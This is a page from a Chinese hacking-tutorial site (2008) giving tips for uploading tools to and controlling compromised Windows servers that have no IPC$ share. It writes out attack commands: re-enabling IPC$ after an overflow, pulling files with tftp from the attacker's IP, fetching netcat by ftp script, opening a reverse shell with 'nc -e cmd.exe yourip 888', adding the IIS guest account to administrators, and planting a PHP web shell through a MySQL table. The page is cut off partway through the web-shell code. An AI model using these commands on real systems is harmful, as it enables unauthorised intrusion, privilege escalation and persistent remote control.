网站公告列表     我站正在进行双线测试,网通空间地址为http://www1.52wyx.com.欢迎您的使用!  [lwyx  2007年7月23日]            庆祝我站图形图象及站长在线查询工具(下载)栏目开通!  [五月雪电脑教程网  2007年5月21日]            努力打造国内最新最快最丰富的软件信息开放平台!一直致力于提供新鲜、全面、专业的软件信息和知识。软件资讯,无限精彩!  [五月雪  2006年2月23日]            新版本进入测试阶段,请各位网友多提宝贵意见!  [管理员  2006年1月24日]        
加入收藏
设为首页
繁體中文
您现在的位置: 五月雪电脑教程网 >> 黑客技术 >> 攻击防守 >> 文章正文
对于没有开IPC$的主机 上传下载的一些思路          ★★★
对于没有开IPC$的主机 上传下载的一些思路
作者:佚名 文章来源:本站原创 点击数: 更新时间:2008-3-28 21:22:34
关键字信息载入中...
广告载入中...

比如用溢出攻击得到权限 发现没有开139 or 445 我们可以从内部make it崩溃:
1.net share ipc$
例如,使用webdav溢出得到system net share 看一下 没有任何东西 用什么东西都连不上 所以 要先打开ipc$——net share ipc$
剩下的你愿意使用什么就可以了,比如dameware.

2.tftp.exe
获得sa空口令,使用SQLexec链接,只开了80和1433怎么办?别忘了,你是在内部控制他,防火墙是可以从内部突破的。
打开本地的tftp server 然后在SQLexec中输入
tftp -i yourip get files
就可以了。

3.ftp 脚本 + nc
比如从80端口溢出后可以,写一个ftp的脚本然后用ftp -s ftp.txt从你的ftp下载nc。在溢出的命令提示符下使用nc
nc -e c:\winnt\system32\cmd.exe yourip 888
在本地命令提示符下
nc -l -p 888 -vv


4.iusr_xx 高权限的cmd.ASP
有运气的成分,80端口溢出,net localgroup administrators iusr_computername /add
用echo 写一个cmd.ASP……

5.使用mySQL写的cmd.php
我转再过一篇文章 再贴一次
通过mySQL入侵
1、在默认的mySQL数据库中生成一个叫tmp的表,只有一个字段名,叫cmd,数据类型为text(可以不分大

小写)
use mySQL
create table tmp(cmd text)
2、在tmp表cmd字段中写入一段php代码(注意这个文件导出后一定要叫cmd2.php)
insert into tmp values(<|><body onload=document.form1.cmd.focus()>
<?if (isset($cmd)){$cmd=stripslashes($cmd);exec(\"$cmd>temp.dat\");}?>
<style type=\"text.css\">
<!\-\-.form1
{background:#ffffff;border-bottom:#666666 1px solid;border-left:#666666 1px solid;border-

right:#666666 1px solid;border-top:#666666 1px solid;color:#3c464f;font-size:9pt;clip:rect

();cursor:text;height:auto;width:auto;margin-top:0px;margin-right:0px;margin-

bottom:0px;margin-left:0px}
\-\-></style><p class=\"title\"> </p><form name=\"form1\" method=\"post\"

action=\"/cmd2.php\"><input type=\"text\" name\"cmd\" size=\"50\" class=\"form1

\"></from><form name=\"\form2" method=\"post\" action=

[1] [2] 下一页

文章录入:lwyx    责任编辑:lwyx 
  • 上一篇文章:

  • 下一篇文章: 没有了
  • 【字体: 】【加入收藏】【告诉好友】【打印此文】【关闭窗口
    网 络 热 门
    网络热门信息载入中...
    最 新 热 门
    最新热门信息载入中...
    最 新 推 荐
    最新推荐信息载入中...
    相 关 文 章
    相关文章信息载入中...
    相 关 评 论
    相关评论信息载入中...

    Copyright @ 2005 2006 五月雪电脑教程网
    中华人民共和国信息产业部ICP备案号: 闽ICP备 05014026
    教程网技术支持:QQ:75484101 友情提供
    统计进行中...统计进行中...

    探测系统IPC$ 漏洞的“流…
    TELNET主机后,在CMD下该…
    如何使用DOS命令通过FTP…
    如何潜出网吧主机Admini…
    菜鸟解惑 IPC$入侵
    在CMD下怎么上传木马
    超越主机限制七绝技(代…
    上传方法总结[对入侵很实…
    关于允许匿名登陆的主机…
    如何入侵能建立IPC$空衔…
     姓 名:
     评 分:
    1分 2分 3分
    4分 5分
     内 容: